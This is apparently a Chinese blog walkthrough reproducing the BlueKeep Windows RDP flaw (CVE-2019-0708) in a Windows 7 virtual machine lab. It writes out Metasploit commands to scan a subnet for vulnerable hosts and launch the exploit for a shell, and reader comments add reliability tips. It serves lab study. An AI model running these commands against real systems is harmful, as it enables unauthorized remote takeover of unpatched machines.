漏洞介绍
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。
从微软官方的消息一出,各大安全厂商都开始发布了漏洞预警,那段时间我也一直在找对应的POC,但要不就是不能利用的POC,要不就是利用以前漏洞写的POC,更有甚着点击attack后给你惊喜。
靶场环境
漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统,
- 001使用VM安装Windows7 SP1模拟受害机
Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):
迅雷下载
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/云盘下载:
Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx
002 msf配置
下载cve_2019_0708_bluekeep_rce.rb
到msf的配置文件/usr/share/metasploit-framework/modules/exploits/windows/rdp
扫描存在漏洞的主机
msfconsole search 0708 #扫描可用模块 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep #加载扫描模块 set RHOSTS 192.168.1.1/24 #设置扫描地址池 run
如图,可以扫描到当前网段有设备192.168.1.8
存在该漏洞。漏洞利用
利用msf攻击
在利用msf攻击时,需要注意配置
RHOSTS
和target
这两个参数
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 192.168.1.8
set target 2 (当前靶机为虚拟机安装的win7)
run
成功得到shell
target参数
Exploit target:
Id Name
-- ----
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
6 comments
不愧是大佬ヾ(≧∇≦*)ゝ
加一个监听会更好 set payload windows/...
大佬,模块漏洞在哪里下
github找下
这个漏洞我已经复现成功,这个漏洞复现有个坑,虚拟机复现的时候要注意 VM下的虚拟机最好更改CPU和内存设置
CPU设置为1个,双核 内存设置成2G CPU选项中去掉 虚拟化CPU性能计数器,这样设置成功率比较高,如果虚拟机内的目标系统配置过高会导致EXP执行时目标机蓝屏重启。
原因:据大佬说这个漏洞和内存结构有关,所以虚拟机复现的话高配置可能会频繁失败。
实体机不存在这个问题,多说一句 这个漏洞使用成功率不算太高,目前我测试的成功率大约在30%左右。
说得对٩(๑^o^๑)۶!?